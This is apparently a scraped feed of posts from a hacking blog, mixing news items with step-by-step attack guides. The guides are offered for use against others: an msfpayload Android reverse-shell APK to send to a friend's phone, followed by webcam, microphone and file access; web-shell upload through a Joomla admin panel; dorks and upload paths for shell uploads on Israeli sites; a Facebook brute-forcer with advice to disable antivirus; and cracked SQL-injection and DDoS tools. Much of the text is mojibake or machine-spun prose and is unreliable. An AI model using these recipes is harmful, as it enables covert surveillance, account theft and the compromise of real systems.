Quantcast
Channel: The Hackers Store
Viewing all 37 articles
Browse latest View live
โ†ง

How to access a Remote Shell on an Android using Metasploit

$
0
0

How to access a Remote Shell on an Android Phone using Metasploit




You will need ...

  • Linux Based System
  • A brain :)ย 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize themsfpayloadcommand from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called โ€œapp.apkโ€ will be created on the desktop:


Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got toย set Metasploit up to listen for all incoming connections.

In Kali OS ย , start Metasploit from the menu or by executing โ€œmsfconsoleโ€ in a Terminal window.


Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.16(enter your Kali IP address)
set LPORT 4444(your choice between ports 2834 and 4500 )
And to start the handler typeexploit


When you run the app on your Android device or victims runs it. It will pop up as a large โ€œMโ€ icon with โ€œMain Activityโ€or something of that sort.

ย A large button will appear on your phone that displays, โ€œReverseTcpโ€, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

ย From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.



Typing โ€œhelpโ€ at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search โ€“f *.mp4



Take photos using the devices cameras


First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap


If you want to take a photo using the second camera

meterpreter > webcam_snap โ€“I 2


Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream โ€“I 2


Any Issue or thing you dont understand feel free to comment below ... Thanksย 




โ†ง

ULTIMATE EXPLOIT PACK

$
0
0


The ULTIMATE EXPLOIT PACK v5.03



Credits to JUAN SACCO for completing the compression and compilation of this tool !!
ULTIMATE EXPLOIT PACK 5

ULTIMATE Exploit Pack utilizes a propelled programming characterized interface that upholds quick reconfiguration to adjust exploitation codes to the always advancing risk environment. Our innovations permit you to quickly tests and safeguard your border against threatening remote targets.



We enhance ULTIMATEย Exploit Pack code ย on a consistent basis and our Tech ย group is really great about keeping the code stable, yet it is not slug verification (bullet proof). Along these lines, utilizing the most recent stable code is a protected and simple approach to access the new components as we're included.


DOWNLOAD FREEย ULTIMATE EXPLOIT PACK 5
If you like it you can consider ......
DOWNLOADINGย ULTIMATE EXPLOIT PACK 5ย Premiumย 
DOWNLOADING ULTIMATE EXPLOIT PACK 5ย Professionalย 


Install Notes


Installation notes:

For Windows:
Download and install Java 8 from Oracle:
Windows Java SE Java 8 for 32 bits or Java 8 for 64 bitsย 
After you have installed Java 8 in your machine, double click ExplotPack.jar or from a console run this command: "java -jar ExploitPack.jar"

For Linux:
Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repositoryย 
Copy and paste the following in a terminal window:

echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

For OSX:
Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits
After you have Java 8 installed in your Mac, double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

Known issues:
Using Exploit Pack could produce addiction
Prolonged periods of time using this tool could produce network mayhem or even dead

In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.


Comment below on any issues or questions you want to askย 
โ†ง
โ†ง

Teenage Hacker Arrested For Hacking FBI Material

$
0
0


ย Teenage Hacker Arrested For Hacking FBI Material

A 15-year-old teen got captured from Scotland, by British Police for breaking into the FBI Systems on 16th February 2016.

Under the Britainโ€™s Hacking Law, Computer Misuse Act 1990, the teen has been arrested for his role in hacking an unauthorized digital material belonging to the Federal Agents.


Federal Agents have already fled to Glasgow in an attempt to carry out a complete raid on the individuals home before proceeding with the boy's arrest.

As with the present scenario, reports reveal that the boy could be extradited to the United States to face the Intrusion and hacking charges.

Second Member of the Hacking Group Arrested

The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.

Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential files and documents breaching security of the FBI.

The hacktivist group "Crackas with Attitude" is behind a multiples of hacks on the United States government and its high-level officials causing much damage with each attack.

As seen above by @IncursioSubter
Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.

Newbie Hackers and Script Kiddies dont go fooling arround and get caughtย 


โ†ง

Distrubuted Denial of Service Attack Mini Pack

$
0
0

DDoS Attack Pack

Beware of Distributed Denial of Service Attacks

DISTRIBUTED DENIAL OF SERVICE

This Acronym DDoS spells out ย "Distributed Denial of Service." A DDoS assault is a pernicious endeavor to make an online administration inaccessible to clients, as a rule by incidentally hindering or suspending the administrations of its facilitating server.

(DoS) VS (DDos)

Unlike the Denial of Service (DoS) attack, where a single web-connected device (one network connection) is used to flood targeted resource with packets, a DDoS attack is executed from many unique connected devices, often distributed globally referred to as a botnet.

Two Types Of DDoS Attacks

UDP

This DDoS assault influences the User Datagram Protocol (UDP), a sessionless systems administration convention. This sort of assault surges irregular ports on a remote host with various UDP packets, bringing about the host to over and over check for the application listening at that port, and (when no application is discovered) answer with an ICMP Destination Unreachable bundle. This procedure saps host assets, and can at last prompt distance.

SYN

A SYN surge DDoS assault abuses a known shortcoming in the TCP association grouping (the "three-way handshake"), wherein a SYN solicitation to start a TCP association with a host must be replied by a SYN-ACK reaction from that host, and after that confirmed by an ACK reaction from the requester. In a SYN surge situation, the requester sends numerous SYN asks for, however either does not react to the host's SYN-ACK reaction, or sends the SYN asks for from a ridiculed IP address. In any case, the host framework keeps on sitting tight for affirmation for each of the solicitations, tying assets until no new associations can be made, and at last bringing about disavowal of administration.

The Three Divisions of DDoS are

Volume Based Attacks
Protocol Attacks
Application Layer Attacks

I have grouped up some DDoS tool found various places over the internet so you can test and if possible fix any bugs.

DDos Toolsย 
Link One
Link Two
Link Three
Link Fourย 
Link Five
Mini Ultimate Pack Depositfilesย (Compressed byย Ha{k3r4l!f3ย )

Share and Comment for My Full Packย 
Toย 
Shutdown any website Https / Http
Ultimate Hack Pack 3.85 Gb Coded byHa{k3r4l!f3

"Corupt Fear Us~ Guilty Confess to Us~ Heroes Join Us"

USE A VPN WITH THESE TOOLS






โ†ง

PIANO TILES 2 MOD

$
0
0

Piano Tiles (2) Moddedย has Surfaced

Get ready to Tap these TILES !!
ย 
ย 
PIANO TILES 2 LATEST MOD
ย 
PIANO TILES 2 is the continuation of the highly popular addictive game Don't Tap the White Tile.ย Updated gameplay, top of the line sound quality and a worldwide competitive modeย allow your fingers to taste a quick pacedย tapping with the great class of piano playing.
ย 
๏ปฟ
๏ปฟ
Playing is simple just tap the black tiles avoid tapping these white squares.
Give it a go, enjoy the piano music u create while tapping ,allow your fingers to be quicker on these tiles, andย compete withย your friends.

PIANO TILES 2 MODS Include :
  • Entirely free Shopping
  • Outstandingย Coin count For Daily Rewards
  • Unlimitedย Energy
As for logging into Facebook here is how to go about it :

Login to Facebook , find Apps and search for Piano Tiles remove it... then login to the Mod version given here and that's All ! :)

ย 
ย 

๏ปฟ
โ†ง
โ†ง

CEO of Facebook Mark Zuckerberg HACKED !!

$
0
0

CEO of Facebook Mark Zuckerberg'sย  Accounts(Twitter, Pinterest) Hacked! Password was revealed as...

ย 
Theย young manย who runs the greatest social network and constantlyย realizes new efforts to establish greater safety to support its billionย users security, He neglected to takeย his security serious and suffered an online breach in hisย online records.
This guy failed to secure his accounts resulting to BREACH IN SECURITY


Yes you guessed it , I am speakingย about The CEO of Facebookย  Mark Zuckerberg, who failed to secure his accounts causingย his Twitter and Pinterest accounts compromised on Sunday.
These HACKERSย group who came fromย Saudi Arabia,ย titled OurMine,ย accepted responsibility for theย breach and take a guess on how theyย succeeded ?

Ohย  before we go to how thisย was Mark Zuckerberg's LinkedIn passwordย "dadada", which he also used for his other online accounts, the group informed us with aย tweet.

ย 
This was possible all thanks toย LinkedIn DATA BREACH






๏ปฟ

ย 
โ†ง

Havij Pro 1.17 Free Full Version Download 2016

$
0
0











ย Havij Pro 1.17 Version Free Full latest crack Download. Many of you guys are looking for Latestย Havij Pro 1.17 Version Full Download. So i have uploaded a crack forย Havij Pro 1.17 Version Full Free Download. So that you can use it freely :)Download Havij Pro 1.17 Full Free / Havij 1.17 Pro Full Version Downloadย Havij 1.17 Pro Full Download - Exploit SQL Injection Attack Tool!
Havij ย is an automated SQL Injection Tool That Helps Penetration. Testers To Find and Exploit SQL Injectionย Vulnerabilitiesย On a Web Page...

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.



Havij Pro 1.17 Version Full Download




It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and ย password hashes, dump tables and columns, fetching data from the database, running SQL ย statements and even accessing the underlying file system and executing commands on the ย operating system.

The power of Havij That Makes it different from similar tools is its injection methods. The success rate is more than 95% at injections vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Features ofย Havij Pro 1.17 Full Version Free
  • ย  ย  HTTPS support
  • ย  ย  Add MSSQL Blind
  • ย  ย  MSAccess more Blind (commercial version only)
  • ย  ย  PostgreSQL added (only commercial version)
  • ย  ย  Check for more updates.
  • ย  ย  User manual query with additional results. (Only the commercial ย  ย  ย  ย  ย  ย  ย  ย  version)
  • ย  ย  First line on the first request (all in one request), plus (commercial ย  ย  ย  ย  ย  ย  version only)
  • ย  ย  Dumping the data to a file is added (only commercial version)
  • ย  ย  Data stored in XML format added (only commercial version)
  • ย  ย  Inject the target with an increase in port (the default http port is 80) ย  ย  ย  ย  ย  (only commercial version)
  • ย  ย  XSS bug in saved reports fixed.
  • ย  ย  Remove log added.
  • ย  ย  Apply button is added to the set makes it possible to change the settings ย  ย  at any time (only commercial version) ย  ย  ย  ย ย 
  • ย  ย  Keyword testing and repair methods are added.
  • ย  ย  Find a sequence of computed columns and optimized for better injection ย  ย  and database to detect.
  • ย  ย  Find the number of columns and column wires for the better.
  • ย  ย  โ€œ414 Request URI too longโ€ error fixed.
  • ย  ย  New method to get the table and column in MSSQL further.
  • ย  ย  An in MSAccess injection when syntax errors are fixed manually defined.
  • ย  ย  Active XP_Exec add cmdshell (only commercial version)
  • ย  ย  Active OS_Ex add cmdshell (only commercial version)
  • ย  ย  Remote desktop-Enable added to cmdshell (only commercial version)
  • ย  ย  Confusing MySQL, MSSQL 2005, when they found that the number of ย  ย  ย  ย  fixed columns.
  • ย  ย  Broken MD5-cracker site removed.
  • ย  ย  Bug in MSSQL error detection is not fixed.
  • ย  ย  An error in the error column MSSQL is not fixed.
  • ย  ย  Bug in injecting into access database fixed.
  • ย  ย  Bug fixed in the data in MSSQL.
  • ย  ย  Find an error in mssql fixed.
  • ย  ย  Bug in detecting database type when the number of fixed columns.
  • ย  ย  Bug in MSSQL error syntactic fixed and executation manually.


:)

โ†ง

inj3ct0r 1337day Clone Blogger Template: Viorenza World 2016

$
0
0

Hello Readers! Many people asked me is there any template for blogger meant for hackers or Please share some blogger templates for hackers. So today I thought of sharing a Template named ย Viorenza World for blogger that is actually a clone of ย inj3ct0r 1337day [Www.1337day.coM] ..


So here it is(Download Link Updated 2016):-


Some Adons:-

1). Search Box:-ย To add a Search Box at the bottom of the header or logo as shown in demo just click onย Add a Gadget and selectย HTML/JavaScript from the list and paste the below code:-
<center>
<form action = 'ย http://Hackers-Store.blogspot.com/ย search 'id =' searchform 'method =' get 'name =' searchform '>
<b/>
<font face = "Tahoma "size =" 2 ">
<span style="color:#008800"> [Search: </ span>
<b/>
<input id = 's' name =' q 'onblur =' if (this.value = = "") {this.value = "";} 'onfocus = "if (this.value ==" ") {this.value =" "}' type = 'text' value ='' />
<input id = 'searchsubmit' type = 'submit' value = 'submit' />
</ b> </ font> </ b> </ form> </ center>

  • Replace the RED BOLD link with your blog's link and click Save.
  • And Drag it to the top of the blog post..ย 
2). RSS Feed:- To add RSS Feed at bottom as shown in Demo just Navigate to Blogger's Layout click Addย Gadgets and select Feedย Gadgetย from the list..


After adding Enter this url in Feed Gadget:-
http://hackers-store.blogspot.com/feeds/posts/default/
Replace RED BOLD link with your blog's link and click Save..
thats it guys :) share it :)
โ†ง

How To Upload Shell in Joomla Via Admin Panel

$
0
0
Hello Guys! Successfully Hacked into Joomla Admin Panel? Not sure how to upload shell in jooma via admin panel? well your are at right place because today we are talking about How To Upload Shell in Joomla Via Admin Panel. Today I'm going t teach you How To Upload Shell in Joomla Via Admin Panel. Its pretty simple! just follow the following steps given below ย :) :-

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

How To Upload Shell in Joomla Via Admin Panel:

Suppose we have an access to joomla admin. Now just login into it..



Once you Login you see the below screen.



Then look forย Extensionsย and in thatย Template Manager.



Once you click on that you will see all the templates installed on that site.



See the marking in red it has the star. It means its the default template used by the sites currently. Select any of the template like it didย beezย in green.



Once you click on beez you will see the following screen. now just click on edit html



Once you click on edit html you will see the following screen



see the red partย /templates/beez/index.phpย that is the path of your shell

Now just paste your shell code over their and save it




Once you click on save. it will take you to page were it will show youย Template source saved.ย you work is done..

Once that is done you can access your shell. Path of the shell would be

www.site.com/templates/beez/index.php

โ†ง
โ†ง

How to get XSS Pop Up on any Site | Javascript Injection

$
0
0
How to get XSS Pop Up on any Site | Javascript Injection: Hello guys! so today we are going to discuss about javascript injection :P. By you can get XSS Pop up on any site all you need to do is just paste some javascript vectors in console prompt of your browser.ย How to get XSS Pop Up on any Site | Javascript Injection

By this you can prank your friends just by pasting javascript on a popular sites like facebook in console and take screenshots and simple send it to your friend :P ok so here we start..How to get XSS Pop Up on any Site | Javascript Injection


How to get XSS Pop Up on any Site | Javascript Injection

Javascript Injection: Produce XSS Pop Up on any Site. Basically, its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection, ok so lets start..

1). For Chrome open console by Ctrl+Shift+I and paste any of these javascript in console box and get pop up :)

2). Do the same for Firefox :)ย Ctrl+Shift+I :)

To Alert and Changing Title on Website by Javascript(XSS)

just enter the below javascript in console :)
Javascript: alert(document.title = "title name");

Message On website on alert Box

Just enter this script:
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");



Getting Cookies By javascripts(XSS)

You can also get cookies by javascript(XSS).. just use below scripts :)
alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie);ย 
What are you waiting for? Just go ahead and prank your friends :P
So thats it for now if you really enjoyed reading do share and don't forget to leave your feedback :)...ย 
โ†ง

Crack Facebook Accounts with VIP FB Cracker 2016

$
0
0
Hello Readers, I know you all are tired of asking everyone "How to hack fb account". Many of you guyz use Phishing for that but now Today Im going to share a wonderful tool for you which does not hack Facebook Account but Crack Facebook account :P lol ..Its a Fb Account Bruteforcer And also a private tool worth $20. I got many Messages from people asking me on Facebook to share this tool. So here it is Guyz..Enjoy it for Free..

NOTE:- Your Antivirus will show this a Virus Its not a virus Its a Cracking Tool that's why you Disable your Antivirus then useย 
Download(DropBox):-
http://sh.st/DveCA
LINK UPDATED 2016!

Rar Password:-hackers-store.blogspot.com

About:-

  • Its a Simple Fb account Bruteforcer(Cracker) uses 1 socket
  • No requires Proxies
  • Auto Save Cracked Accountsย 



How to Use :-

1). Download the VIP FB Cracker From here. And Extract it..

2). It contains the following things :-



3). Open Vip FB Cracker..



  • Load the Email list to Crack
  • Then password list
  • And finally click on Start


NOTE:- If you are getting any .OCX error Start Error_FixeR.exe which is in the .rar file Then open the Software ..

4).If you cracked a fb account you will get it UnderFB Accounts Cracked:



Enjoy!!!!!
POST UPDATED! :) 2016
โ†ง

Israel Private 0Day Shell Upload Exploits ASP|PHP

$
0
0
Israel Private 0Day Shell Upload Exploits ASP|PHP

Israel Private 0Day Shell Upload Exploits ASP|PHP:ย Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits. So i thought of sharing with you all....So lets Start....
Israel Private 0Day Shell Upload Exploits ASP|PHP
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork

# Exploit Upload 1 -|-
/admin/adminbanners.aspx

# Exploit Upload 2 -|-ย 
/admin/AdminPics.aspx

When you upload your asp or php shell just Check Code Source of the page you will see your url Shell example: /banners/1a62aa_bddf_4e3d_8464_f0f62ac8c7.asp
Israel Private 0Day Shell Upload Exploits ASP|PHP
2). Second 0day Upload

# Dork -|-ย 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=

# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
โ€ช#โ€ŽExploitโ€ฌย -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php
Israel Private 0Day Shell Upload Exploits ASP|PHP
3). Third 0day Upload Blind Sql Injection

ย This just Targets with havij or manually and admin page of the script isย www.target.co.il/QAdmin
# Dork -|-ย 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2

So thats it guys we have seen ย Israel Private 0Day Shell Upload Exploits ASP|PHP shre it :)
โ†ง

Huge List of Darknet (Deep Web) Hidden Websites 2016

$
0
0



Huge List of Darknet (Deep Web) Hidden Websites 2016: Hello! guys so today i will be sharing HUGE list of Darknetย (Deep Web) hidden websites with you all! :)
NOTE: Some of them may not work because either the sites are expired or closed :) So you can infom me in comment section below so that i can remove them :))

Warning:(Please read First):ย Before you go to any of these, make sure you verify it's not a scam. And even if things are marked non-scams THEY MAY STILL BE SCAMS!ย 
Make sure to be secured after access.

I(thehackerstore.com) isย not bear the responsibility of any thing happened to you .. You are the only responsible to protect yourself.










โ†ง
โ†ง

b374k 3.2 PHP Shell download Updated 2016

$
0
0

b374k 3.2 PHP Shell Updated 2016, b374k 3.2 PHP Shell, b374k 3.2, b374k, b374k 3.2 PHP Shell download, b374k PHP Shell free download,ย b374k 3.2 PHP Shell download Updated 2016

b374k 3.2 PHP Shell download Updated 2016

Download:-

โ†ง

Candy Crush Soda Saga Modded APK has landed {LATEST}

$
0
0




Candy Crush Soda Saga Modded APK has landed {LATEST}







Candy Crush Soda Saga (CCSS)

Candy Crush Soda Saga is the name of the new arrangement of the famous amusement organization, King.com, the maker of the game and acquainted the world to construct another adaptation of the amusement Candy Crush Soda Saga named ie the variant of sodium. The PRO variant of the new characters and graphical design are very high.


Highlights
  1. Staggering HD representation and are extremely delicious!ย 
  2. Booster added to assist in the more elevated levels
  3. Characters and new interface in this Soda version
  4. Challenging and extremely difficult procedureย 
  5. 165 exceptionally energizing stage in this gameย 
  6. This version highlights a multiplayer and Sharing Experience
  7. It gets addictive :)

Ulternative Linksย 
Version
ย One
Versionย 
Twoย 
Version
ย Three
ย 


There might be problems when login into Facebook in this Moded Candy Crush Soda Saga

Here is what you do :
    1. Download Candy Crush Soda Saga APK to your sd card.ย 
    2. Uninstall or simply solidify Facebook.ย 
    3. Uninstall old version of this game.ย 
    4. Install the downloaded file, and connect through Facebook.ย 
    If by any chance you have problems login into Facebook, go to app info ,force stop the game solidify/uninstall Facebook then that should solve the issue.

    Issues or problems feel free to comment below :) Thanks

                    โ†ง

                    ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ :๐†๐Ž๐‹๐ƒ๐„๐๐ข๐ญ๐ข๐จ๐ง

                    $
                    0
                    0

                    ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ :๐†๐Ž๐‹๐ƒ๐„๐๐ข๐ญ๐ข๐จ๐ง๐‘๐ž๐›๐ข๐ซ๐ญ๐ก (๐“ฅ๐“˜๐“ก๐“ค๐“ข๐“•๐“ก๐“”๐“”) :)
                    โ€ชโ€Ž๐Œ๐จ๐›๐ข๐ฅ๐žWhatsAppโ€ช๐‚๐จ๐ง๐ญ๐š๐œ๐ญโ€ฌ +๐Ÿ(๐Ÿ•๐Ÿ“๐Ÿ–) ๐Ÿ•๐Ÿ๐Ÿ‘-๐Ÿ—๐Ÿ“๐Ÿ”๐Ÿ“
                    .......................................................................

                    'ย GOLD WHATSAPPย '

                    โ€ชโ€Ž๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉโ€ฌ ๐Œ๐ž๐ฌ๐ฌ๐ž๐ง๐ ๐ž๐ซ๐ข๐ฌ๐šโ€ชโ€Ž๐…๐‘๐„๐„โ€ฌ โ€ช๐ฆ๐ž๐ฌ๐ฌ๐š๐ ๐ข๐ง๐ โ€ฌ ๐š๐ฉ๐ฉ๐š๐ฏ๐š๐ข๐ฅ๐š๐›๐ฅ๐ž๐Ÿ๐จ๐ซโ€ช ๐€๐ง๐๐ซ๐จ๐ข๐โ€ฌ, ๐๐ฅ๐š๐œ๐ค๐›๐ž๐ซ๐ซ๐ฒ ,๐๐จ๐ค๐ข๐šโ€ช ๐ˆ๐ฉ๐ก๐จ๐ง๐žโ€ฌ ๐š๐ง๐๐š๐ฅ๐ฌ๐จโ€ช๐–๐ข๐ง๐๐จ๐ฐ๐ฌ๐๐ก๐จ๐ง๐ž๐ฌโ€ฌ. ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ๐ฎ๐ฌ๐ž๐ฌ๐ฒ๐จ๐ฎ๐ซ๐ฉ๐ก๐จ๐ง๐ž'๐ฌ๐ˆ๐ง๐ญ๐ž๐ซ๐ง๐ž๐ญ๐œ๐จ๐ง๐ง๐ž๐œ๐ญ๐ข๐จ๐ง (๐Ÿ’๐†/๐Ÿ‘๐†/๐Ÿ๐†/๐„๐ƒ๐†๐„๐จ๐ซ๐–๐ข-๐…๐ข, ๐š๐ฌ๐š๐ฏ๐š๐ข๐ฅ๐š๐›๐ฅ๐ž) ๐ญ๐จ๐ฅ๐ž๐ญ๐ฒ๐จ๐ฎ๐ฆ๐ž๐ฌ๐ฌ๐š๐ ๐ž๐š๐ง๐๐œ๐š๐ฅ๐ฅ๐Ÿ๐ซ๐ข๐ž๐ง๐๐ฌ๐š๐ง๐๐Ÿ๐š๐ฆ๐ข๐ฅ๐ฒ. ๐’๐ฐ๐ข๐ญ๐œ๐ก๐Ÿ๐ซ๐จ๐ฆโ€ชโ€Ž๐’๐Œ๐’โ€ฌ ๐ญ๐จ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ๐ญ๐จ๐ฌ๐ž๐ง๐๐š๐ง๐๐ซ๐ž๐œ๐ž๐ข๐ฏ๐žโ€ช#โ€Ž๐ฆ๐ž๐ฌ๐ฌ๐š๐ ๐ž๐ฌโ€ฌ, ๐œ๐š๐ฅ๐ฅ๐ฌ, ๐ฉ๐ก๐จ๐ญ๐จ๐ฌ, ๐ฏ๐ข๐๐ž๐จ๐ฌ, ๐๐จ๐œ๐ฎ๐ฆ๐ž๐ง๐ญ๐ฌ, ๐š๐ง๐โ€ช#โ€Ž๐•๐จ๐ข๐œ๐žโ€ฌ ๐Œ๐ž๐ฌ๐ฌ๐š๐ ๐ž๐ฌ.
                    ........................................................................
                    ๐“๐‡๐ˆ๐’โ€ช#โ€Ž๐†๐Ž๐‹๐ƒโ€ฌ ๐„๐๐ข๐ญ๐ข๐จ๐ง๐ˆ๐ง๐œ๐ฅ๐ฎ๐๐ž๐ฌ๐š๐ฅ๐ฅโ€ช#โ€Ž๐Ÿ๐ž๐š๐ญ๐ฎ๐ซ๐ž๐ฌโ€ฌ ๐จ๐Ÿ๐ญ๐ก๐ž๐จ๐ซ๐ข๐ ๐ข๐ง๐š๐ฅ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ.
                    ๐ˆ๐ง๐œ๐ฅ๐ฎ๐๐ข๐ง๐ ๐„๐ฑ๐ญ๐ซ๐š๐ฌ:
                    *โ€ช๐๐ซ๐ข๐ฏ๐š๐œ๐ฒโ€ฌ (๐‡๐ข๐๐ž - ๐“๐ฒ๐ฉ๐ข๐ง๐  ,๐Ž๐ง๐ฅ๐ข๐ง๐ž๐’๐ญ๐š๐ญ๐ฎ๐ฌ, ๐๐ฅ๐ฎ๐ž๐“๐ข๐œ๐ค๐ฌ ,๐’๐ž๐œ๐จ๐ง๐๐“๐ข๐œ๐ค๐ž๐ญ๐œ)
                    *โ€Ž๐“๐ก๐ž๐ฆ๐žโ€ฌ ๐„๐ง๐ ๐ข๐ง๐ž (๐‚๐ฎ๐ฌ๐ญ๐จ๐ฆ๐ข๐ฌ๐ž๐ฒ๐จ๐ฎ๐ซ๐–๐ก๐š๐ญ๐ฌ๐€๐ฉ๐ฉ๐ญ๐ก๐ž๐ฐ๐š๐ฒ๐ฒ๐จ๐ฎ๐ฅ๐ข๐ค๐ž)
                    *๐๐ž๐ฐ๐…๐จ๐ง๐ญ (๐˜๐จ๐ฎ๐œ๐š๐ง๐ซ๐ž๐ช๐ฎ๐ž๐ฌ๐ญ๐œ๐ก๐š๐ง๐ ๐ž๐ฌ๐ญ๐จ๐ข๐ญ )
                    *๐‚๐จ๐ฉ๐ฒ๐’๐ญ๐š๐ญ๐ฎ๐ฌ๐Ž๐Ÿโ€ชโ€Ž๐Ž๐ญ๐ก๐ž๐ซ๐ฌโ€ฌ.
                    * ๐‹๐จ๐ ๐Ž๐ฎ๐ญ
                    *๐ˆ๐ง๐๐ข๐ฏ๐ข๐๐ฎ๐š๐ฅ๐‚๐จ๐ง๐ญ๐š๐œ๐ญ๐๐ซ๐ข๐ฏ๐š๐œ๐ฒ
                    *๐‹๐จ๐œ๐คโ€ช๐ˆ๐ง๐๐ข๐ฏ๐ข๐๐ฎ๐š๐ฅโ€ฌ โ€ช๐‚๐ก๐š๐ญโ€ฌ.
                    Read More.....


                    โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡โฌ‡
                    ๐ƒ๐Ž๐–๐๐‹๐Ž๐€๐ƒ
                    โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†โฌ†




                    โ†ง

                    Kickass Torrents is back with new Domain- katcr.co 2017

                    $
                    0
                    0
                    Kickass Torrents is back with new Domain- katcr.co 2017: Few months ago, Kickass Torrents (kat.cr) was brought down due to some criminal investigations by US Government.

                    Not only Kickass Torrents but many other torrent sites went down like Torrentz.eu and the Piratebay.org . Yet there were many mirrors were available to access these sites but most them were fake. Due to this many faced difficulties to find good valuable torrents and many small torrent sites came up.



                    Kickass Torrents is back with new Domain- katcr.co, But now after 3 months, Kickass Torrents is again brought up by some Original Staffers, with new domain- katcr.co. According to TorrentsFreak, Some employees reunited launched new Kickass Torrents(katcr.co), with some torrents uploaded. and Most of the other administrators and moderators joined them and few of them got separated.

                    The database of site is newly built and the design of the site seems similar to old version. Well this is a good news for every torrent user because Kickass Torrents was the every torrent user's first priority.

                    Visit New Kickass Torrent Now - KATCR.CO
                    โ†ง
                    โ†ง
                    Viewing all 37 articles
                    Browse latest View live